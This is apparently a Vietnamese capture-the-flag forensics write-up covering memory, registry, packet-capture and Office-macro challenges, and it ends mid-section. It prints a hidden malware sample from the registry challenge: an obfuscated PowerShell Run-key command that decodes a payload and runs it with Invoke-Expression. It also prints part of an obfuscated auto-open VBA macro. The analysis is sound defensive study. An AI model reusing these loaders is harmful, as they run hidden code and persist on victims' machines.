4NjQgMHg3NSAweDc4IDB4YiAweDAgMHgxIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4ZGEgMHg3MiAweDE1IDB4NzYgMHgzNCAweDllIDB4ZjEgMHg3ZCAweDQ4IDB4ZGUgMHg0MiAweDFhIDB4ZjMgMHg2MyAweDViIDB4YzggMHgzZiAweDc4IDB4YjkgMHg0NSAweDUxIDB4NmUgMHg3YiAweGVmIDB4YTUgMHhmNSAweGQ5IDB4ZWIgMHg4NSAweGQ0IDB4ODEgMHgxNiAweDUwIDB4NGIgMHg3IDB4OCAweGJmIDB4ZjkgMHgyNyAweGJiIDB4MjAgMHgwIDB4MCAweDAgMHgxNCAweDAgMHgwIDB4MCAweDUwIDB4NGIgMHgxIDB4MiAweDFlIDB4MyAweGEgMHgwIDB4OSAweDAgMHgwIDB4MCAweGMgMHg3ZSAweGM3IDB4NTYgMHhiZiAweGY5IDB4MjcgMHhiYiAweDIwIDB4MCAweDAgMHgwIDB4MTQgMHgwIDB4MCAweDAgMHg4IDB4MCAweDE4IDB4MCAweDAgMHgwIDB4MCAweDAgMHgxIDB4MCAweDAgMHgwIDB4YTQgMHg4MSAweDAgMHgwIDB4MCAweDAgMHg2NiAweDZjIDB4NjEgMHg2NyAweDJlIDB4NzQgMHg3OCAweDc0IDB4NTUgMHg1NCAweDUgMHgwIDB4MyAweDU4IDB4NDQgMHg4MCAweDY0IDB4NzUgMHg3OCAweGIgMHgwIDB4MSAweDQgMHhlOCAweDMgMHgwIDB4MCAweDQgMHhlOCAweDMgMHgwIDB4MCAweDUwIDB4NGIgMHg1IDB4NiAweDAgMHgwIDB4MCAweDAgMHgxIDB4MCAweDEgMHgwIDB4NGUgMHgwIDB4MCAweDAgMHg3MiAweDAgMHgwIDB4MCAweDAgMHgwIDB4NTAgMHg0YiAweDMgMHg0IDB4YSAweDAgMHg5IDB4MCAweDAgMHgwIDB4YyAweDdlIDB4YzcgMHg1NiAweGJmIDB4ZjkgMHgyNyAweGJiIDB4MjAgMHgwIDB4MCAweDAgMHgxNCAweDAgMHgwIDB4MCAweDggMHgwIDB4MWMgMHgwIDB4NjYgMHg2YyAweDYxIDB4NjcgMHgyZSAweDc0IDB4NzggMHg3NCAweDU1IDB4NTQgMHg5IDB4MCAweDMgMHg1OCAweDQ0IDB4ODAgMHg2NCAweDg2IDB4NDQgMHg4MCAweDY0IDB4NzUgMHg3OCAweGIgMHgwIDB4MSAweDQgMHhlOCAweDMgMHgwIDB4MCAweDQgMHhlOCAweDMgMHgwIDB4MCAweGRhIDB4NzIgMHgxNSAweDc2IDB4MzQgMHg5ZSAweGYxIDB4N2QgMHg0OCAweGRlIDB4NDIgMHgxYSAweGYzIDB4NjMgMHg1YiAweGM4IDB4M2YgMHg3OCAweGI5IDB4NDUgMHg1MSAweDZlIDB4N2IgMHhlZiAweGE1IDB4ZjUgMHhkOSAweGViIDB4ODUgMHhkNCAweDgxIDB4MTYgMHg1MCAweDRiIDB4NyAweDggMHhiZiAweGY5IDB4MjcgMHhiYiAweDIwIDB4MCAweDAgMHgwIDB4MTQgMHgwIDB4MCAweDAgMHg1MCAweDRiIDB4MSAweDIgMHgxZSAweDMgMHhhIDB4MCAweDkgMHgwIDB4MCAweDAgMHhjIDB4N2UgMHhjNyAweDU2IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4OCAweDAgMHgxOCAweDAgMHgwIDB4MCAweDAgMHgwIDB4MSAweDAgMHgwIDB4MCAweGE0IDB4ODEgMHgwIDB4MCAweDAgMHgwIDB4NjYgMHg2YyAweDYxIDB4NjcgMHgyZSAweDc0IDB4NzggMHg3NCAweDU1IDB4NTQgMHg1IDB4MCAweDMgMHg1OCAweDQ0IDB4ODAgMHg2NCAweDc1IDB4NzggMHhiIDB4MCAweDEgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHg1MCAweDRiIDB4NSAweDYgMHgwIDB4MCAweDAgMHgwIDB4MSAweDAgMHgxIDB4MCAweDRlIDB4MCAweDAgMHgwIDB4NzIgMHgwIDB4MCAweDAgMHgwIDB4MCAweDUwIDB4NGIgMHgzIDB4NCAweGEgMHgwIDB4OSAweDAgMHgwIDB4MCAweGMgMHg3ZSAweGM3IDB4NTYgMHhiZiAweGY5IDB4MjcgMHhiYiAweDIwIDB4MCAweDAgMHgwIDB4MTQgMHgwIDB4MCAweDAgMHg4IDB4MCAweDFjIDB4MCAweDY2IDB4NmMgMHg2MSAweDY3IDB4MmUgMHg3NCAweDc4IDB4NzQgMHg1NSAweDU0IDB4OSAweDAgMHgzIDB4NTggMHg0NCAweDgwIDB4NjQgMHg4NiAweDQ0IDB4ODAgMHg2NCAweDc1IDB4NzggMHhiIDB4MCAweDEgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHg0IDB4ZTggMHgzIDB4MCAweDAgMHhkYSAweDcyIDB4MTUgMHg3NiAweDM0IDB4OWUgMHhmMSAweDdkIDB4NDggMHhkZSAweDQyIDB4MWEgMHhmMyAweDYzIDB4NWIgMHhjOCAweDNmIDB4NzggMHhiOSAweDQ1IDB4NTEgMHg2ZSAweDdiIDB4ZWYgMHhhNSAweGY1IDB4ZDkgMHhlYiAweDg1IDB4ZDQgMHg4MSAweDE2IDB4NTAgMHg0YiAweDcgMHg4IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4NTAgMHg0YiAweDEgMHgyIDB4MWUgMHgzIDB4YSAweDAgMHg5IDB4MCAweDAgMHgwIDB4YyAweDdlIDB4YzcgMHg1NiAweGJmIDB4ZjkgMHgyNyAweGJiIDB4MjAgMHgwIDB4MCAweDAgMHgxNCAweDAgMHgwIDB4MCAweDggMHgwIDB4MTggMHgwIDB4MCAweDAgMHgwIDB4MCAweDEgMHgwIDB4MCAweDAgMHhhNCAweDgxIDB4MCAweDAgMHgwIDB4MCAweDY2IDB4NmMgMHg2MSAweDY3IDB4MmUgMHg3NCAweDc4IDB4NzQgMHg1NSAweDU0IDB4NSAweDAgMHgzIDB4NTggMHg0NCAweDgwIDB4NjQgMHg3NSAweDc4IDB4YiAweDAgMHgxIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4NCAweGU4IDB4MyAweDAgMHgwIDB4NTAgMHg0YiAweDUgMHg2IDB4MCAweDAgMHgwIDB4MCAweDEgMHgwIDB4MSAweDAgMHg0ZSAweDAgMHgwIDB4MCAweDcyIDB4MCAweDAgMHgwIDB4MCAweDAgMHg1MCAweDRiIDB4MyAweDQgMHhhIDB4MCAweDkgMHgwIDB4MCAweDAgMHhjIDB4N2UgMHhjNyAweDU2IDB4YmYgMHhmOSAweDI3IDB4YmIgMHgyMCAweDAgMHgwIDB4MCAweDE0IDB4MCAweDAgMHgwIDB4OCAweDA) decode thử, thì đây là file zip nè. Mình download về mở thì cần mật khẩu. Mình nhớ đến cái chuỗi kì lạ ban đầu lúc exiftool. pass: `y0u_c4n_n0t_cr4ck_th1s_f1l3_w1th_th3_d3f4ut_w0rdl1st_0n_k4l1` Mình mở được file flag.txt để lấy flag --- # 0x0 - ********************File: legit.png******************** *Description: Gần đây trong một sự cố, chúng tôi phát hiện kẻ tấn công đã đánh cắp dữ liệu của chúng tôi bằng cách nhúng nó vào trong một tệp hình ảnh và sử dụng các chức năng upload để đưa dữ liệu ra khỏi hệ thống của chúng tôi một cách an toàn. Bạn có thể tìm xem dữ liệu được ẩn giấu là gì không?* File này đã bị corrupt, kích thước không đúng (0x0) nên mình sẽ dựa vào checksum của chunk IHDR để bruteforce dimension của ảnh. Link tham khảo srcipt: https://github.com/cjharris18/png-dimensions-bruteforcer  --- # SS2-Tin học văn phòng - ********************File: Challenge.doc******************** *Description: Sau khi tham gia một khóa Tin học văn phòng cơ bản, Hòa đã có thể tự tạo một tệp tài liệu độc hại và anh ta có ý định sẽ dùng nó để hack cả thế giới* Bài này chỉ là về marco thôi, mình dùng `olevba <filename>` để extract marco từ file doc là được. --- # SS2- Báo cáo đang dở - ********************File: MEMORY.DMP .raw, .mem******************** *Description: Hòa đang làm báo cáo bài tập lớn để nộp cho thầy giáo thì bỗng nhiên máy tính của anh ấy bị tắt đột ngột do mất điện mà anh ấy thì chưa kịp lưu báo cáo một lần nào. Tuy nhiên sau đó, thay vì viết báo cáo mới thì Hòa đã chọn cách dành ra 4h đồng hồ để khôi phục báo cáo ban đầu từ tệp crash dump nhưng cuối cùng vẫn thất bại. Hòa thực sự đang cần trợ giúp.* Đây là một bài về memory, nên là mình sẽ dùng framework Volatilty 3 để làm bài này. Đầu tiên xem các tiến trình. ``` 4 0 System 0xfa80024bb840 90 512 N/A False 2023-05-31 18:18:24.000000 N/A Disabled 268 4 smss.exe 0xfa8002c5e400 2 30 N/A False 2023-05-31 18:18:24.000000 N/A Disabled 356 340 csrss.exe 0xfa80037e7060 9 451 0 False 2023-05-31 18:18:26.000000 N/A Disabled 440 340 wininit.exe 0xfa8003a68060 3 79 0 False 2023-05-31 18:18:26.000000 N/A Disabled 460 448 csrss.exe 0xfa8003a67060 10 231 1 False 2023-05-31 18:18:26.000000 N/A Disabled 520 448 winlogon.exe 0xfa8003ab6700 3 111 1 False 2023-05-31 18:18:26.000000 N/A Disabled 528 440 services.exe 0xfa8003ab7810 7 207 0 False 2023-05-31 18:18:26.000000 N/A Disabled 564 440 lsass.exe 0xfa8003aeab30 9 570 0 False 2023-05-31 18:18:26.000000 N/A Disabled 572 440 lsm.exe 0xfa8003aec810 10 144 0 False 2023-05-31 18:18:26.000000 N/A Disabled 672 528 svchost.exe 0xfa8003b6e3c0 10 356 0 False 2023-05-31 18:18:27.000000 N/A Disabled 732 528 vmacthlp.exe 0xfa8003b9fb30 3 56 0 False 2023-05-31 18:18:27.000000 N/A Disabled 768 528 svchost.exe 0xfa8003bd3b30 9 292 0 False 2023-05-31 18:18:27.000000 N/A Disabled 868 528 svchost.exe 0xfa8003c18060 20 480 0 False 2023-05-31 18:18:27.000000 N/A Disabled 924 528 svchost.exe 0xfa8003c52b30 16 377 0 False 2023-05-31 18:18:27.000000 N/A Disabled 952 528 svchost.exe 0xfa8003c613a0 42 1036 0 False 2023-05-31 18:18:27.000000 N/A Disabled 400 528 svchost.exe 0xfa8003cb24b0 12 542 0 False 2023-05-31 18:18:27.000000 N/A Disabled 856 528 svchost.exe 0xfa8003ce3b30 15 364 0 False 2023-05-31 18:18:27.000000 N/A Disabled 1116 528 spoolsv.exe 0xfa8003d6f250 15 338 0 False 2023-05-31 18:18:27.000000 N/A Disabled 1148 528 svchost.exe 0xfa8003d91b30 19 316 0 False 2023-05-31 18:18:27.000000 N/A Disabled 1340 924 dwm.exe 0xfa8003e38b30 5 124 1 False 2023-05-31 18:18:28.000000 N/A Disabled 1372 1304 explorer.exe 0xfa8003e64960 39 1058 1 False 2023-05-31 18:18:28.000000 N/A Disabled 1472 528 taskhost.exe 0xfa8003ea8410 8 145 1 False 2023-05-31 18:18:28.000000 N/A Disabled 1544 528 VGAuthService. 0xfa8003f23b30 3 85 0 False 2023-05-31 18:18:28.000000 N/A Disabled 1684 528 vmtoolsd.exe 0xfa8003f6f200 9 293 0 False 2023-05-31 18:18:28.000000 N/A Disabled 1928 1372 vmtoolsd.exe 0xfa800407db30 6 186 1 False 2023-05-31 18:18:29.000000 N/A Disabled 1288 528 svchost.exe 0xfa8004087060 5 103 0 False 2023-05-31 18:18:29.000000 N/A Disabled 1316 672 WmiPrvSE.exe 0xfa8004b03060 10 211 0 False 2023-05-31 18:18:29.000000 N/A Disabled 2136 528 dllhost.exe 0xfa8004b05b30 15 207 0 False 2023-05-31 18:18:29.000000 N/A Disabled 2288 528 msdtc.exe 0xfa8004480b30 14 154 0 False 2023-05-31 18:18:30.000000 N/A Disabled 2564 528 SearchIndexer. 0xfa80045344a0 13 616 0 False 2023-05-31 18:18:34.000000 N/A Disabled 2844 672 WmiPrvSE.exe 0xfa80045b8530 10 239 0 False 2023-05-31 18:18:49.000000 N/A Disabled 1736 1372 WINWORD.EXE 0xfa8003a6e060 13 443 1 False 2023-05-31 18:20:18.000000 N/A Disabled 2792 528 svchost.exe 0xfa8003c86920 5 74 0 False 2023-05-31 18:20:18.000000 N/A Disabled 2956 528 OSPPSVC.EXE 0xfa8003fcab30 3 129 0 False 2023-05-31 18:20:19.000000 N/A Disabled 1916 528 svchost.exe 0xfa8003f83b30 12 321 0 False 2023-05-31 18:20:29.000000 N/A Disabled 2484 868 audiodg.exe 0xfa8003c83b30 6 136 0 False 2023-05-31 18:26:32.000000 N/A Disabled 1076 2228 taskmgr.exe 0xfa8004103b30 9 121 1 False 2023-05-31 18:27:43.000000 N/A Disabled ``` Theo mô tả là đang tìm lại bài báo cáo đang dở, có một process khá thú vị là WINWORD.EXE với PID là 1736, đây là đang chạy ms word, nên mình sẽ dump tiến trình này ra. Ở data section, có một file `AutoRecovery save of Document1.asd` , đây là cơ chế tự động phục hồi của MS word, nên có khả năng là bài báo cáo đã được tự động phực hồi ở đây, nên mình sẽ binwalk để xem thử nội dung. Ở path `_file.0xfa80041e2070.0xfa8003d7b6d0.DataSectionObject.AutoRecovery save of Document1.asd.dat.extracted\word\media` có 2 ảnh, và một ảnh chứa flag.  --- # SS2 - Sổ đăng kí - ********************File: NTUSER.DAT******************** Description: *Hòa thấy hiện tượng lạ mỗi khi anh ta khởi động máy tính. Anh ta nghĩ rằng việc tải các video không lành mạnh gần đây đã khiến máy tính của anh ta bị hack.* Đề cho chúng ta file NTUSER.DAT, đầu tiên cần biết file này là file gì.  (Web này cung cấp những thông tin cơ bản về: [Window Registry](https://winreg-kb.readthedocs.io/en/latest/sources/windows-registry/Files.html) , hoặc có một blog bằng tiếng việt: [blog](https://sec.vnpt.vn/2021/04/windows-forensic-registry-analysis-part1/) ) Là file registry nên mình cần dùng Registry Explorer trên windows, hoặc là dùng regripper để phân tích, tuy nhiên mình không load được lên Registry Explorer nên mình sẽ dùng [regripper](https://manpages.ubuntu.com/manpages/jammy/man1/regripper.1.html). Parse file: `regripper -r /path/to/Cookie/SS2/arenas2-forensics-so-dang-ki/NTUSER.DAT -f ntuser > parsed.txt` Mình chuyển hướng vào file text cho dễ phân tích. Ở Key `Software\Microsoft\Windows\CurrentVersion\Run` ( nơi lưu giá trị là các file thực thi được khởi động tự động khi user đăng nhập) ```Software\Microsoft\Windows\CurrentVersion\Run LastWrite Time 2023-05-25 03:55:25Z Updater - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "(neW-obJEct io.COMprEssIon.dEFlATesTReAm( [sySTem.IO.memorYSTREam] [coNVeRT]::FRoMBAse64stRInG( 'TVFva4JAGP8qh7hxx/IwzbaSBZtsKwiLGexFhJg+pMs09AmL6rvP03S9uoe739/nZD+OIEHySmwolNn6F3wkzilH2HEbkDupvwXM+cKaWxWSSt2Bxrv9F64ZOteepU5vYOjMlHPMwNuVQnItyb8AneqOMnO5PiEsVytZnHkJUjnvG4ZuXB7O6tUswigGSuVI0Gsh/g1eQGt8h6gdUo98CskGQ8aIkgBR2dmUAw+9kkfvCiiL0x5sbwdNlQUckb851mTykfhpECUbdstXjo2LMIlEE0iCtedvhWgER1I7aKPHLrmQ2QGVmkbuoFoVvOE9Eckaj8+26vbcTeomqptjL3OLUM/0q1Q+030RMD73MBTYEZFuSmUMYbpEERduSVfDYZW8SvwuktJ/33bx/CeLEGirU7Zp52ZpLfYzPuQhZVez+SsrTnOg7A8='), [SYSTEM.iO.ComPReSSion.CoMPrEsSIonmODe]::DeCOmpresS)|FOREAcH-object{ neW-obJEct io.streAMrEadeR( $_,[sysTem.TExt.EnCoDING]::asCIi )}).reaDToEnD()|inVOKe-exprEsSIon" ``` Có thể thấy là powershell chạy câu lệnh rất đáng nghi, decode bằng [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Raw_Inflate(0,0,'Adaptive',false,false)&input=VFZGdmE0SkFHUDhxaDdoeHgvSXd6YmFTQlp0c0t3aUxHZXhGaEpnK3BNczA5QW1MNnJ2UDAzUzl1b2U3MzkvblpEK09JRUh5U213b2xObjZGM3dremlsSDJIRWJrRHVwdndYTStjS2FXeFdTU3QyQnhydjlGNjRaT3RlZXBVNXZZT2pNbEhQTXdOdVZRbkl0eWI4QW5lcU9Nbk81UGlFc1Z5dFpuSGtKVWpudkc0WnVYQjdPNnRVc3dpZ0dTdVZJMEdzaC9nMWVRR3Q4aDZnZFVvOThDc2tHUThhSWtnQlIyZG1VQXcrOWtrZnZDaWlMMHg1c2J3ZE5sUVVja2I4NTFtVHlrZmhwRUNVYmRzdFhqbzJMTUlsRUUwaUN0ZWR2aFdnRVIxSTdhS1BITHJtUTJRR1Zta2J1b0ZvVnZPRTlFY2thajgrMjZ2YmNUZW9tcXB0akwzT0xVTS8wcTFRKzAzMFJNRDczTUJUWUVaRnVTbVVNWWJwRUVSZHVTVmZEWVpXOFN2d3VrdEovMzNieC9DZUxFR2lyVTdacDUyWnBMZll6UHVRaFpWZXorU3NyVG5PZzdBOD0) , chúng ta sẽ có kết quả như thế này  --- # SS2- TrivialFTP - ********************File: trivialFTP.pcapng******************** *Description: Việc những nhân viên của một công ty X sử dụng các giao thức không an toàn để kết nối và truyền tải tập tin từ xa đã tạo cơ hội cho những kẻ tấn công Man in the Middle và đánh cắp dữ liệu quan trọng của công ty* Dựa vào tên của challenge này mình sẽ filter `tftp` lên xem sao, thì thấy một packet như thế này. Sau khi google các kiểu thì mình tìm một blog nói khá dễ hiểu về [TFTP](http://isp.vsi.ru/library/Networking/TCPIPIllustrated/tftp_tri.htm) protocol, và đặc biệt và nó dùng udp protocol để truyền dữ liệu, nên là mình sẽ filter lên cho dễ xem.  Có thể thấy là file `flag.pdf` được truyền với kiểu là netascii. Như đã nói thì truyền dữ liệu bằng UDP nên mình sẽ filter lại và bắt đầu xem từ packets 2973 trở đi. Nếu các bạn đọc link mình đính kèm ở trên về TFTP thì sẽ thấy là mỗi packets truyền đi sẽ có độ dài 516, trong đó 2 byte đầu tiên là opcode, 2 byte tiếp theo là block number và data là 512 bytes. Dữ liệu sẽ được truyền theo từng block như vậy cho đến khi có block data nhỏ hơn 512 bytes là tín hiệu kết thúc. Về opcode thì opcode = 3 chính là packets truyền data. Vậy nên filer bây giờ sẽ là `udp && ip.src == 192.168.25.135 && ip.dst == 192.168.25.1` Packet cuối cùng có độ dài data nhỏ hơn 512 bytes  packet cuối cùng có độ dài data nhỏ hơn 512 Dùng tshark để extract data: ```bash tshark -r /path/to/file.pcapng -Y "udp && ip.src == 192.168.25.135 && ip.dst == 192.168.25.1" -T fields -e data.data > data.txt ``` Sau đó là viết script để loại bỏ 4 bytes header đi, và khôi phục file pdf ```bash data="" with open(r"arenas2-forensics-trivialFTP\output.txt", "r") as file: data=file.read() with open(r"arenas2-forensics-trivialFTP\flag.pdf", "wb") as file: lines = data.splitlines() for line in lines: line=line.strip() file.write(bytes.fromhex(line)) ``` Tuy nhiên, lúc mình viết chạy script này thì file pdf của mình bị lỗi. Fix hồi lâu vẫn không khôi phục được, mình đổi sang cố gắng extract data từ file pdf bị lỗi đó nhưng vô dụng. Đến cuối cùng thì mình biết mình đã bỏ một thông tin quan trọng là netsacii.  Cre: wikipedia Theo như trên ảnh thì null = 0x00, kí tự xuống dòng(LF) = 0x0A và kí tự đầu dòng (CR) = 0x0D Và bất kì kí CR nào cũng phải kèm theo null hoặc LF, có nghĩa là data được padding thêm 0x00 hoặc 0x0A. do đó cần thêm một chút code vào script xử lí data ở trên. ```bash line = lline.strip().replace('0d0a','0a').replace('0d00','0d') ``` Như vậy là mở được file `flag.pdf` và có flag. # SS2 - Under Control - ********************File: NoStarWhere.pcapng******************** *Description: Sau khi mẫu tài liệu độc hại của Hòa bị các nhà phân tích từ Cookie Arena mổ xẻ và mỉa mai là quá đơn giản, Hòa quyết tâm tham gia tiếp một khóa Tin học văn phòng nâng cao để tạo ra một mẫu mã độc phức tạp hơn. Sau đó, Hòa thử nghiệm mẫu mã độc mới bằng cách đính kèm vào email phishing cho thầy giáo của mình. Cuối cùng Hòa chiếm quyền điều khiển thành công máy tính của thầy giáo và thậm chí còn đánh cắp được tập bài kiểm tra cuối kì sắp tới.* Dùng tshark để export object từ protocol HTTP: `tshark -r NoStarWhere.pcapng --export-object "http,./"` File `Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi.xls` đang cố gắng chạy một lệnh gì đó trong hệ thống (để an toàn thì nên làm ở máy ảo), nên mình sẽ dùng `oletools` để xem marco của nó. `olevba Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi.xls > ./macro.txt` ``` VBA MACRO Module1.vba in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub Auto_Open() Workbook_Open End Sub Sub AutoOpen() Workbook_Open End Sub Sub WorkbookOpen() Workbook_Open End Sub Sub Document_Open() Workbook_Open End Sub Sub DocumentOpen() Workbook_Open End Sub Function ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨) ¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»· = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåض§Ú¥" »¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢ = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" For y = 1 To Len(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨) ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯© = InStr(¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·, Mid(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨, y, 1)) If ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯© > 0 Then ¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®« = Mid(»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢, ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯©, 1) ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» + ¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®« Else ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» + Mid(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨, y, 1) End If Next ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨ = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» For ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° = 1 To Len(®¶®¾ª¼¿¢·¥»°¾£º¤¿º·¡¦ª¹¹¾´°¢²¶©»°´¢«°µ¸¶¥¤·«½¿¢´¹º¡º»º¸®µ»³¸µ»¦¦½¨¾¾¨¦²) ®¶®¾ª¼¿¢·¥»°¾£º¤¿º·¡¦ª¹¹¾´°¢²¶©»°´¢«°µ¸¶¥¤·«½¿¢´¹º¡º»º¸®µ»³¸µ»¦¦½¨¾¾¨¦² = ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° Next For ¥½µ©¡»¡·¤¼¶µ¢¾·½¼¾®¦»»¼¬§ª¦·°¹·³¹¸¤µ³³¡¢£§´¤´¹¨´¡¾¦¬°¹¦¼¥°¡³» = 2 To Len(£©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦) £©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦ = 2 Next For »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· = 3 To Len(»¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸) »¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸ = »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· Next For 